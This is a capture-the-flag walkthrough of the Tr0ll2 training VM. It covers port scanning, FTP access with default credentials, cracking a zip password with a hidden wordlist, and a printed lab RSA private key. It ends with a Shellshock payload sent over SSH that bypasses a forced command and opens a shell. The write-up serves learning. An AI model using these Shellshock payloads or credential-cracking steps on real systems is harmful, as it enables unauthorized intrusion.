Machine Information
Host discovery
- target IP:
10.10.10.135
Information Gathering
Nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
nmap -p- -T4 10.10.10.135 -A -oA 10.10.10.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 15:26 +08
Nmap scan report for 10.10.10.135
Host is up (0.0014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:18:F1:37 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.38 ms 10.10.10.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.70 seconds
Exploting Port 21
Lets look for something interesting in FTP. I could not access it with anonymous password but I managed to login using Tr0ll:Tr0ll.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ftp 10.10.10.135
Connected to 10.10.10.135.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.135:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||59692|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
229 Entering Extended Passive Mode (|||53681|).
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
100% |***********************************************************************************************************************************************************************************************| 1474 3.27 MiB/s 00:00 ETA
226 Transfer complete.
1474 bytes received in 00:00 (1.26 MiB/s)
After getting the zip file, I unzipped it and analyzed it.
1
2
3
unzip lmao.zip
Archive: lmao.zip
[lmao.zip] noob password:
The zip file has password protected. Time to crack with john. I could not crack the password, So I leave it alone and move on to port 80
Exploiting Port 80
I started out looking around the website. After awhile, I found a robots.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
curl http://10.10.10.135/robots.txt
User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stop
Now that I have this list, I tried to brute force and see what it is
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
gobuster dir -w ./robots.txt -u http://10.10.10.135
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.135
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ./robots.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/keep_trying (Status: 301) [Size: 318] [--> http://10.10.10.135/keep_trying/]
/dont_bother (Status: 301) [Size: 318] [--> http://10.10.10.135/dont_bother/]
/ok_this_is_it (Status: 301) [Size: 320] [--> http://10.10.10.135/ok_this_is_it/]
/noob (Status: 301) [Size: 311] [--> http://10.10.10.135/noob/]
Progress: 23 / 24 (95.83%)
===============================================================
Finished
===============================================================
I managed to get 4 directories which looks promising. I then explore one by one.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
curl http://10.10.10.135/keep_trying/
<html>
<img src='cat_the_troll.jpg'>
<!--What did you really think to find here? Try Harder!>
</html>
curl http://10.10.10.135/dont_bother/
<html>
<img src='cat_the_troll.jpg'>
<!--What did you really think to find here? Try Harder!>
</html>
curl http://10.10.10.135/noob/
<html>
<img src='cat_the_troll.jpg'>
<!--What did you really think to find here? Try Harder!>
</html>
curl http://10.10.10.135/ok_this_is_it/
<html>
<img src='cat_the_troll.jpg'>
<!--What did you really think to find here? Try Harder!>
</html>
After looking into all 4 directories, all the results were same. Since everything is same, I decided to look into the cat_the_troll.jpg as it might contain useful information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
curl http://10.10.10.135/keep_trying/cat_the_troll.jpg -o 4
curl http://10.10.10.135/dont_bother/cat_the_troll.jpg -o 3
curl http://10.10.10.135/noob/cat_the_troll.jpg -o 2
curl http://10.10.10.135/ok_this_is_it/cat_the_troll.jpg -o 1
cat 1 2 3 4 | strings -n 10
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
Look Deep within y0ur_self for the answer
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
In one of he images, there’s this line which might be the lead to the next directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
curl http://10.10.10.135/y0ur_self/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /y0ur_self</title>
</head>
<body>
<h1>Index of /y0ur_self</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="answer.txt">answer.txt</a></td><td align="right">04-Oct-2014 01:22 </td><td align="right">1.3M</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.2.22 (Ubuntu) Server at 10.10.10.135 Port 80</address>
</body></html>
In this directory, there’s an ansewr.txt. I then download and see what it is.
1
2
3
4
5
6
7
8
9
10
curl http://10.10.10.135/y0ur_self/answer.txt | head
QQo=
QUEK
QUIK
QUJNCg==
QUMK
QUNUSAo=
QUkK
QUlEUwo=
QU0K
It seems like the answer.txt is a list of random stuff which is encoded with base64. I then decode the answer.txt and use the list to crack the hash of the zip file.
1
2
3
4
5
6
7
8
9
john --wordlist=./answer.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ItCantReallyBeThisEasyRightLOL (lmao.zip/noob)
1g 0:00:00:00 DONE (2024-02-07 16:09) 100.0g/s 819200p/s 819200c/s 819200C/s A..Saussure
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that I have the credentials, time to unzip and see whats in it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─# cat noob
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
-----END RSA PRIVATE KEY-----
this seems like a file where I could just ssh into it without the need of password. I then tried to check if the file is password protected or not.
1
2
3
ssh noob@10.10.10.135 -i noob -o PubkeyAcceptedKeyTypes=ssh-rsa
TRY HARDER LOL!
Connection to 10.10.10.135 closed.
it seems like I was kicked out after login with the pem file using user noob. I then try to execute command with ssh instead of getting a shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
ssh noob@10.10.10.135 -i noob -o PubkeyAcceptedKeyTypes=ssh-rsa -v
OpenSSH_9.6p1 Debian-2, OpenSSL 3.1.4 24 Oct 2023
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug1: Connecting to 10.10.10.135 [10.10.10.135] port 22.
debug1: Connection established.
debug1: identity file noob type -1
debug1: identity file noob-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.6p1 Debian-2
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4
debug1: compat_banner: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000002
debug1: Authenticating to 10.10.10.135:22 as 'noob'
debug1: load_hostkeys: fopen /root/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: ecdh-sha2-nistp256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none
debug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg
debug1: load_hostkeys: fopen /root/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: Host '10.10.10.135' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:26
debug1: rekey out after 4294967296 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 4294967296 blocks
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: get_agent_identities: bound agent to hostkey
debug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities
debug1: Will attempt key: noob explicit
debug1: Trying private key: noob
Authenticated to 10.10.10.135 ([10.10.10.135]:22) using "publickey".
debug1: channel 0: new session [client-session] (inactive timeout: 0)
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: filesystem
debug1: Remote: Forced command.
debug1: Sending environment.
debug1: channel 0: setting env LANG = "en_US.UTF-8"
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
TRY HARDER LOL!
debug1: channel 0: free: client-session, nchannels 1
Connection to 10.10.10.135 closed.
Transferred: sent 2912, received 1712 bytes, in 0.1 seconds
Bytes per second: sent 51549.3, received 30306.4
debug1: Exit status 0
After trying to view what is happening with SSH, I noticed this debug1: Remote: Forced command. I then found a interesting article that I could follow along.
1
2
3
4
5
6
7
ssh noob@10.10.10.135 -i noob -o PubkeyAcceptedKeyTypes=ssh-rsa '() { :;}; id'
uid=1002(noob) gid=1002(noob) groups=1002(noob)
ssh noob@10.10.10.135 -i noob -o PubkeyAcceptedKeyTypes=ssh-rsa '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
whoami
noob
Now that I managed to get a shell, its time to perform privilege Escalation
Privilege Escalation
Time to check around.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
noob@Tr0ll2:~$ find / -perm -u=s 2>/dev/null
/bin/su
/bin/umount
/bin/ping
/bin/mount
/bin/fusermount
/bin/ping6
/usr/bin/chfn
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/nothing_to_see_here
/nothing_to_see_here/choose_wisely
/nothing_to_see_here/choose_wisely/door2
/nothing_to_see_here/choose_wisely/door2/r00t
/nothing_to_see_here/choose_wisely/door3
/nothing_to_see_here/choose_wisely/door3/r00t
/nothing_to_see_here/choose_wisely/door1
/nothing_to_see_here/choose_wisely/door1/r00t
I search for SUID bit and somehow, there’s alot of weird SUID bit set. Time to check and see. After checking, it is about binary exploitation. So I gave up from here onwards.
Things I learned from the machine
- Shellshock with ssh : More Info